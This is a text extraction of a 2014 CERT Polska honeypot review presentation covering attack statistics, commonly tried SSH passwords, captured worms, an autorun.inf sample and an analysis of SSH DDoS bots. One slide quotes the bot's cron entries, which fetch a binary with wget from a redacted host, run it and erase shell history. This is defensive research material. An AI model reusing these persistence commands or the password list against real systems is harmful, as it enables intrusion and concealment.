caught in the honeypot almost a year in review
play

Caught in the honeypot: (almost) a year in review ukasz Siewierski - PowerPoint PPT Presentation

Caught in the honeypot: (almost) a year in review ukasz Siewierski Polish Chapter / CERT Polska 2014 Honeynet Project Workshop Warsaw, 12th May, 2014 Honeeebox ukasz Siewierski Caught in the honeypot: (almost) a year in review 2 / 11


  1. Caught in the honeypot: (almost) a year in review Łukasz Siewierski Polish Chapter / CERT Polska 2014 Honeynet Project Workshop Warsaw, 12th May, 2014

  2. Honeeebox Łukasz Siewierski Caught in the honeypot: (almost) a year in review 2 / 11

  3. Setup Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  4. Setup Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  5. Setup ! t r o p p u s P T F S h t i w w o N Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  6. Setup ! t r o p p u s P T F S h t i w w o N Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

  7. Statistics ( ∼ 1 month): Dionaea samples Captures Unique samples Distinct URLs Distinct IPs 1,475 1,290 135,981 345 Łukasz Siewierski Caught in the honeypot: (almost) a year in review 4 / 11

  8. Statistics ( ∼ 1 month): Kippo Unique logins Unique ASNs Sessions Distinct IPs 2,395 2,631 272 100 Łukasz Siewierski Caught in the honeypot: (almost) a year in review 5 / 11

  9. Statistics (1 month): popular passwords admin 123qwe!@# master 123qweasd 1q2w3e4r5t 1qaz@WSX 142536 abc123 123123 12345678 root00 12345 root@123 654321 password 1234 test toor 111 123 123qwe huawei qazwsx Passw0rd welcome 1234%^&* p@ssw0rd1 1q2w3e qweasd rootroot manager 0 redhat root1234 123.com qwe123 P@ssw0rd rootpass firewall 1234567890 passw0rd qwe123!@# power root123 password1 q1w2e3r4t5 abcd1234 1qaz2wsx admin123 123456789 qazxsw asdf1234 root 1q2w3e4r letmein Łukasz Siewierski Caught in the honeypot: (almost) a year in review 6 / 11

  10. Samples from Dionaea (Samba) 1 Popular worms: Conficker, Sality, Allaple etc. 2 Some autorun.inf files, e.g.: [autorun open= shell\open\Command=RECYCLER\NTDETECT.EXE D98009DC shell\open\Default=1 shell\explore\Command=RECYCLER\NTDETECT.EXE D98009DC 3 SysInternals PsExec (light-weight telnet replacement) 4 Samples detection rates (VT) are high, about 40-ish out of 50-ish Łukasz Siewierski Caught in the honeypot: (almost) a year in review 7 / 11

  11. SSH: DDoS (multiplatform) bots ELF 32-bit LSB executable, Intel 80386, rarely UPX-packed, rarely stripped (OOD in C++), usually linked statically. Recon (bruteforce SSH) then SFTP (binary/ies + cron file) Gathers all system info and pings back to C&C Wait for DDoS orders (DNS amplification, UDP flood etc.) Automatic updates (via cron!) Persistence achieved via /etc/rcx.d/ script and / or cron Łukasz Siewierski Caught in the honeypot: (almost) a year in review 8 / 11

  12. DDoS bot: cron magic */1 * * * * killall -9 .IptabLes */1 * * * * cd /var/log > dmesg */1 * * * * echo "unset MAILCHECK" >> /etc/profile */95 * * * * killall -9 ferwfrre */120 * * * * cd /root;rm -rf dir nohup.out */140 * * * * cd /etc; wget http://[xxx]/ferwfrre */96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1& */1 * * * * rm -rf /root/.bash history */1 * * * * touch /root/.bash history */1 * * * * history -r Łukasz Siewierski Caught in the honeypot: (almost) a year in review 9 / 11

  13. Do YOU know what attacks your network? Łukasz Siewierski Caught in the honeypot: (almost) a year in review 10 / 11

  14. Last slide Thank you for your attention Łukasz Siewierski Caught in the honeypot: (almost) a year in review 11 / 11

  15. Źródła This slides would not be so beautiful without: L A T EX and beamer (and many, many other packages), Wikimedia Commons and its pictures, which are available on GPL and Creative Commons licenses, Łukasz Siewierski Caught in the honeypot: (almost) a year in review 12 / 11

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend